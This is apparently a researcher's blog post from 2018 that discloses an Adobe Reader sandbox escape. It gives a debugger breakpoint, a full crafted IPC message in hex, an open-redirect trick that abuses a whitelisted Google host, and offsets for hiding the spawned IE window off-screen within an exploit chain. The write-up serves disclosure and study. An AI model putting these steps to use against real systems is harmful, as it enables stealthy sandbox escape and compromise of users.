Friday, January 19, 2018

Adobe Reader Escape... or how to steal research and be lame.

(I hope I’m not overlooking anything and making wrong assumptions.. I’m not a very smart person)

Version tested:


Note: Similar - if not the same - bug was discussed in this talk: https://cansecwest.com/slides/2013/Adobe%20Sandbox.pdf (just using a different method of navigating..which I think does not work anymore today)

How to reproduce:
1.       Open windbg, attach to the low IL acrord32.exe process.
2.       Put a breakpoint on the function responsible for sending out our IPC call to the broker process:

Bp AcroRd32.exe+0x14D30

Note: This ofcourse is version dependent, just search for xrefs to the import “SignalObjectAndWait” … normally only this function calls it, regardless of version (just bp at the start of the function).

3.       Let it run, wait for the breakpoint to hit. Once that happens we simply change the message with a crafted one by using the following command:

Eb poi(esp+0x4) 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 04 00 00 00 AC 00 00 00 04 00 00 00 01 00 00 00 B4 00 00 00 EC 00 00 00 02 00 00 00 A4 01 00 00 04 00 00 00 02 00 00 00 AC 01 00 00 04 00 00 00 02 00 00 00 B4 01 00 00 04 00 00 00 02 00 00 00 BC 01 00 00 04 00 00 00 02 00 00 00 C4 01 00 00 04 00 00 00 06 00 00 00 CC 01 00 00 0A 02 00 00 00 00 00 00 FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 00 74 00 74 00 70 00 73 00 3A 00 2F 00 2F 00 61 00 63 00 63 00 6F 00 75 00 6E 00 74 00 73 00 2E 00 67 00 6F 00 6F 00 67 00 6C 00 65 00 2E 00 63 00 6F 00 6D 00 2F 00 4C 00 6F 00 67 00 6F 00 75 00 74 00 3F 00 63 00 6F 00 6E 00 74 00 69 00 6E 00 75 00 65 00 3D 00 68 00 74 00 74 00 70 00 73 00 3A 00 2F 00 2F 00 61 00 70 00 70 00 65 00 6E 00 67 00 69 00 6E 00 65 00 2E 00 67 00 6F 00 6F 00 67 00 6C 00 65 00 2E 00 63 00 6F 00 6D 00 2F 00 5F 00 61 00 68 00 2F 00 6C 00 6F 00 67 00 6F 00 75 00 74 00 3F 00 63 00 6F 00 6E 00 74 00 69 00 6E 00 75 00 65 00 3D 00 68 00 74 00 74 00 70 00 3A 00 2F 00 2F 00 63 00 6E 00 6E 00 2E 00 63 00 6F 00 6D 00 00 00 00 00 00 00 00 00 0F 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 FF 00 00 00 00 00 00 00 FF 00 00 00 00 00 00 00 FF 02 00 00 00 00 00 00 FF 02 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00

The tag for this “crosscall” is 0x111 .. it has 8 parameters .. one of them is an URL. The broker process will check this URL against an hardcoded list of host names:



If our url hostname matches one in the list it won’t prompt before opening some weird IE frame, that runs in the broker process at medium (best idea ever, and yes IE = Internet Explorer).

But Adobe is not really smart, because its super easy to find something like this:

https://accounts.google.com/Logout?continue=https://appengine.google.com/_ah/logout?continue=http://cnn.com

So yea, the stupid hostname is going to match (accounts.google.com is whitelisted) .. but it will simply redirect to whatever… so… that’s kind of silly .. xD

So we can open weird IE windows running at medium without prompt and control the contents!
Our chain would look like this: Adobe reader RCE -> This escape -> IE RCE  (its not pretty, but we don’t need an IE sandbox escape, since it already runs at medium……… I think…. Atleast inspect.exe tells me it does).

We can also easily hide the IE window since we control its size and position, and by giving the position a large value it will be rendered outside the screen for some weird reason (atleast on my VM) … the offset for the position in our message is: 0x1A4 and 0x1AC  size is: 0x1B4 and 0x1BC

If we use a “normal” size and position values it will look like this.. lets say position 0xFF, 0xFF and size 0x2FF, 0x2FF:



Now if we change our position parameters to 0x4FF and 0x4FF and size to 0x65 and 0x65, it will look like this (renders outside the screen!):





So besides the adobe icon in the taskbar it won’t be suuuuper obvious… so if your IE RCE doesn’t take ages to run (once you get medium IL RCE… you just close the stupid IE window again), I guess it would be fine! This bug was one that immediately stood out for me … its just so obvious.. but its an ugly bug, because it requires a long chain … but I have a decent idea of the attack surface now, so maybe I can find better bugs in the future!





1 comment: